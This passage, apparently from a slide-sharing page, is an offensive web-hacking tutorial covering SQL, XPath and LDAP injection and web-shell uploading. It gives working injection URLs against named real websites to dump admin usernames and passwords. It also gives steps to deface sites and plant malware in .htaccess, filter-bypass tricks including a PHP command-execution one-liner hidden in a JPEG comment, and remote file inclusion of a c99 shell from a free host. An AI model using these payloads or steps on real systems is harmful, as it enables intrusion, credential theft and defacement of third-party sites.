8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
Malware Attachment On Website :
1] Go to Public Html tab on your 404.php shell &
2] Open .htaccess on your shell
3] and past your malware coading.

Sql injection String & Union based :
1. Sql injection String based
[1] Decreption
In String based Sql injection :
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln
to SQLi)
[2] Example
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with
SQLi
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
id=X' order by--+
Alright that you've got the point lets try String Based on some of the other types of SQL
injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases

http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of
my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where
table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where
table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+

1,2,group_concat(table_name,0x0a),4 from information_schema.tables where
table_schema=database()--+
1,2,group_concat(column_name,0x0a),4 from information_schema.columns where
table_name=0x61646d696e--+
1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+
2. Sql injectionUnionbased :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
,30,31—
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
9,30,31—

1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31 from information_schema.tables where table_schema =
database()—
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31 from information_schema.columns where table_name =
0x6e675f61646d696e—
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from
ng_admin—
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php

Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'

Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :

Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
=====================================================================

LDAP injections :
---[ 0x01: Introduction ]
The technique of LDAP (Lightweight Directory Access Protocol) is
a lightweight
protocol to access the directory service X.500. This protocol
works over TCP/IP.
The access protocol LDAP is used to query and modify objects
stored.
---[ 0x02: Filters LDAP ]
It is quite important to understand how does the LDAP filters
work.
FC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515).
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
Logical operators:
- AND "&"
- OR "|"
- NOT "!"
Relational operators:
<=, >=, =, ~=
The wildcard "*" It is used to replace characters.
Filter example:
(&(objectClass=user)(uid=*)): We return a list of all objects of
type user, no matter

which takes the value of the attribute "uid."
---[ 0x02: LDAP injection in Web Applications ]
The technique Ldap injection is very similar to SQL injection.
The attack technique is used to operate websites built LDAP
judgments directly from
data supplied by the user.
Vulnerable code with comments (by Sacha Faust):
+++++++++++++++++++++++++++++++++++++
line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please
specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" '
searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:

line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : "
+ ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i)
+ "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>
+++++++++++++++++++++++++++++++++++++
In line 10 note userName variable is initialized with the value
the parameter user and then quickly validated to see if the
value is zero.
If the value is not zero, the variable userName is used to
initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search to be
used in
the call to SearchFilter on line 27
The attacker has full control over what will be consulted on the
LDAP server.
You will get the result of the consultation when the code
reaches of the line 32 to 40,
all results and its attributes are displayed to the user.
Example 1:
http://website/ldap.asp?user=*
In this example dispatched the character "*" parameter in the
"user" which ends
in the variable filter.
This judgment LDAP will show any object that has an attribute
uid.
We show all users and their information.
Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)

It will show us the path to the user ka0x.
They can do tests with the code before they leave.
---[ 0x03: Links ]
http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protoc
ol
http://es.wikipedia.org/wiki/LDAP
http://www.ldapman.org/
__EOF__
# milw0rm.com [2007-11-04]
© Offensive Security 2011

Part 2
Web server Hacking
Using above vulnerabilities various type of hacks that can be used to hack web
server.
Guide content:
 Shell Uploading Guide
 Shell uploading through php-my-admin
 Shell Jumping
 Symlink Bypass 2013 forLinux Servers
 Hack Web-DAV & Deface
 Root server without local root exploit
 LINUX SERVER ROOTING Tutorial
 Cpanel Cracking
 Bypass 403 ForbiddenAndCant Read /Etc/Named.Config Error
 Backdoor a WEB SERVERS WITH WEBACOO
 Web Server Hacking through Command Injection
 How To Hack Windows Servers Using Dubrute 2.2
 Symlink Tutorial for beginners
 MASS DEFACETUTORIAL
 How to hack a websites using Symlink Bypassing
 ATTACKING WEBSERVERS VIA .HTACCESS
 How to Back-connect withnetcat
 Hacking Cold FusionServers - Part I
 Hacking Cold FusionServers - Part II

So let’s get started !
1. Shell Uploading Guide
Many newbie’s face problem while uploading shell on a site after getting admin access/ logging
in to that site. So, I am writing this in order to help them. Basically shell gives us remote access
to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we
have to choose a shell that will work on the server according to the server script. If the server
supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s
come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY
UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But
sometimes we have to do some changes to upload a shell.
Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW
UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then
just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the
shell name was shell.php, then we will rename it as shell.php.jpg or anything else.
Way 2
Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN
UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A
UPLOADER SHELL FROM HERE .

WAY 3
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE
headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL
SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the
shell code starts. liKe below…
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking
its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a
iMage.
WAY 4
This method is more advanced. This only works for client side filters rather than server side.
download firebug for Firefox, then edit the html of the upload .
<form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload
DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input
type="submit" value="Upload File" /> </form>
Change the filter accept. to *.* or just remove it completely , it will then let you upload any type
of file.
WAY 5
Download “LIVE HTTP HEADERS” addon first for your firefox browser
1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site
supports only jpg file. Thats why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this

4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two boxes, but we have to
work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button

WAY 6
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now
add this to the jpg comment since you wont be able to drop a whole shell in there due to limits
etc.
"; system($_GET['cmd']); echo ?>
now rename your jpg to .php and upload.
WAY 7
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to
get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then
tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any
problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials
on this is available in web. So I am not explaining this step by step.

WAY 8
All the above mention way works when we find an upload button on the site. but when there is no upload
button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a
edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole
script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that
link will be your shell. possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in
through admin panel. They only allow file upload after logging through cpanel.
WAY 9
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE
A SHELL FROM ANOTHER HOSTINGSITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTINGSITE LIKE www.my3gb.com www.3owl.com ,
www.ripway.com , , www.000webhost.com , etc.
2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE
SITE IS www.site.com
3) Now we have to execute this following command to gain shell access to that site.
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINK IN THE COMMAND ACCORDINGTO YOUR SHELL &
VULERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager
> check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit
html now paste ur shell code and click save...done site.com/templates/template name/index.php like
site.com/templates/beez/index.php
2.Wordpress:
login into admin panel expand Appearance then click on editor > u will find style.css
now select 404.php on right side paste ur shell code and click edit file u can find
shell in site.com/wp-content/themes/theme name u edit/404.php

Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits

Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits

Similar to Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits (20)

More from Raghav Bisht

More from Raghav Bisht (15)

Recently uploaded

Recently uploaded (20)

Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits